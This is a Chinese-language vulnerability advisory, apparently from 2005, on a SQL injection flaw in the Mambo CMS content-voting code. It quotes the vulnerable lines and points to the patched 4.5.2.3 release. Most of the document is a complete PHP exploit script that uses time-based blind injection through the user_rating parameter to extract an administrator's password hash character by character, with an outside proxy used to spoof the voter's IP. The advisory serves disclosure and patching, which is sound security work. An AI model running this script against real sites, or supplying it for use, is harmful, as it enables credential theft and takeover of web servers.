信息来源:绿盟科技
发布日期:2005-06-16
更新日期:2005-06-16
受影响系统:
Mambo Mambo Open Source <= 4.5.2.2
不受影响系统:
Mambo Mambo Open Source 4.5.2.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: _blank>13966
Mambo是一款开放源代码的WEB内容管理系统。
Mambo的com_contents中存在严重的SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。
-- content.php --
100 case 'vote':
101 recordVote ( $url , $user_rating , $cid ,
$database);
102 break;
...
1478 $query = "UPDATE
#__content_rating"
1479 . "\n SET rating_count =
rating_count + 1,"
1450 . "\n rating_sum = rating_sum
+ $user_rating,"
1451 . "\n lastip = '$currip'"
1452 . "\n WHERE content_id = ". $cid
1453 ;
----------------
在1450行$user_rating未经任何验证便使用用户提供的数据,导致用户可以获得敏感信息。
<*来源:pokley (
saleh@scan-associates.net)
al3ndaleeb (
al3ndaleeb@uk2.net)
链接:_blank>
http://marc.theaimsgroup.com/?l= ... 85974124936&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
ini_set("max_execution_time","999999");
$benchcount = 150000;
$aid= 62;
$cid = 2;
$charmap = array (48,49,50,51,52,53,54,55,56,57,
97,98,99,100,101,102,
103,104,105,
106,107,108,109,110,111,112,113,
114,115,116,117,118,119,120,121,122
);
if($argv[1]){
$url = $argv[1];
if ($argv[2])
$aid = $argv[2];
if ($argv[3])
$benchcount = $argv[3];
if ($argv[4])
$proxy = $argv[4];
}
else {
echo "Usage: ".$argv[0]." <URL> [userid] [benchmarkcount] [proxy]\n\n";
echo "\tURL\t URL to mambo site (ex: _blank>
http://127.0.0.1)\n";
echo "\taid\t userid to get (default: 62 (admin))\n";
echo "\tbenchmarkcount\t benchmark count (default: 150000)\n";
echo "\tproxy\t optional proxy url (ex: _blank>
http://10.10.10.10:8080)\n";
exit;
}
// rate from different ip (using _blank>
http://projectbypass.com)
$projectbypass = "_blank>
http://projectbypass.com/nph-proxy3.cgi/010110A/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \
tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \
CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);
curl_close ($ch);
// standard page loading time
$start = time();
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$sloadtime = floatval($stop - $start);
echo "standard page loading =".$sloadtime."\n";
// benchmark page loading time
$start = time();
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \
=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \
benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \
CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$bloadtime = floatval($stop - $start);
echo "bencmark page loading =".$bloadtime."\n";
// check if SQL query failed
if (ereg("DB function failed",$res)){
echo "[x] mysql < 4.1 detected - not exploitable\n";
exit();
}
if ($bloadtime <= $sloadtime + 2){
echo "[x] increase your benchmark count\n";
exit();
}
echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\tUserid = $aid\n";
echo "\tPassword Hash = ";
// starting fetch password
$benchcount = $benchcount*2;
for($i= 1;$i< 33;$i++){
foreach ($charmap as $char){
$start = time();
echo chr($char);
$ch = curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \
id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \
nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \
ntent_id=$cid/*"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$stop = time();
$xloadtime = floatval($stop - $start);
if (floatval($xloadtime) > $bloadtime){
$hash .= chr($char);
break 1;
}
else {
echo chr(8);
}
if ($char == 103){
echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";
exit;
}
}
}
echo "\n";
?>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mambo
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载4.5.2.3版本:
_blank>
http://mamboforge.net/frs/downlo ... .5.2.3-stable.tar.g z
